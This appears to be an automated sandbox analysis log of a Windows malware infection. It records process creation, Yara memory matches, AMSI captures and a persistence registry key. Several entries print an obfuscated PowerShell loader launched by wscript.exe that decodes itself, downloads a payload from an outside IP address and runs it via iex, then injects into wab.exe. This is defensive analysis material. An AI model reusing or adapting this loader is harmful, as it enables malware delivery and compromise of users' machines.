Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. ,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Argean.Men && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. ,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Argean.Men && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"
Source: unknown	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Windows\SysWOW64\AtBroker.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: unknown	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. ,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Argean.Men && echo $"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. ,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Argean.Men && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: Yara match	File source: 00000005.00000002.2487767026.000000000A034000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2487176127.0000000008CD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2761711892.000001CB10070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2478265897.0000000006060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Fremadstrbendes)$global:Bsselbets = [System.Text.Encoding]::ASCII.GetString($Philonic)$global:Laryngotome=$Bsselbets.substring(277822,26651)<#huldes Bisoner Almene Reinduce Archemper
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Dekomponer $Ackee $Overtraining), (Fotografien @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Preconfiding = [AppDomain]::CurrentDomain.GetAssemblies()$gl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Kontroversielle)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Ventilatorens, $false).DefineType($Unenti
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Fremadstrbendes)$global:Bsselbets = [System.Text.Encoding]::ASCII.GetString($Philonic)$global:Laryngotome=$Bsselbets.substring(277822,26651)<#huldes Bisoner Almene Reinduce Archemper

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848F278FB push ebx; retf	2_2_00007FF848F2796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848F27958 push ebx; retf	2_2_00007FF848F2796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848FF1A59 push edx; ret	2_2_00007FF848FF1A65
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848FF191B push esp; ret	2_2_00007FF848FF191C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848FF798B push edi; iretd	2_2_00007FF848FF798C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848FF71C8 push esp; retf	2_2_00007FF848FF71C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848FF7C54 push esp; iretd	2_2_00007FF848FF7C55
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848FF7F49 push ecx; iretd	2_2_00007FF848FF7F4A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07AC0AB8 push eax; mov dword ptr [esp], ecx	5_2_07AC0AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07AC08C2 push eax; mov dword ptr [esp], ecx	5_2_07AC0AC4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227009AD push ecx; mov dword ptr [esp], ecx	8_2_227009B6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_03A98515 push E4840C47h; retf	8_2_03A9851A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_03A98915 push E4840C43h; iretd	8_2_03A9891A
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_01148934 push cs; ret	10_2_01148937
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_011529A0 push ebx; retf	10_2_011529BC
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_01159021 push ds; iretd	10_2_01159090
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_01159028 push ds; iretd	10_2_01159090
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_0115909B push ds; iretd	10_2_01159090
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_01154344 push 0000004Ah; retf	10_2_01154376
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_01154346 push 0000004Ah; retf	10_2_01154376
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_0115B28D push edi; ret	10_2_0115B28E
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_011552B4 push cs; retf	10_2_011552D1
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_01160533 push edx; ret	10_2_01160534
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_0116055F push FFFFFF8Ch; ret	10_2_01160568
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_01160D68 push edi; ret	10_2_01160D73
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_01144DDC push 804E3DDAh; iretd	10_2_01144DE2
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_01144DC0 push eax; iretd	10_2_01144DC2
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_01154DE4 push ecx; iretd	10_2_01154DE5
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_01156C20 push edi; retf	10_2_01156C48
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_0115ACC4 push ss; iretd	10_2_0115ACC7
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_01152628 push ebx; ret	10_2_011526D8

Source: C:\Windows\SysWOW64\AtBroker.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AJ5HR8DXLPTX			Jump to behavior
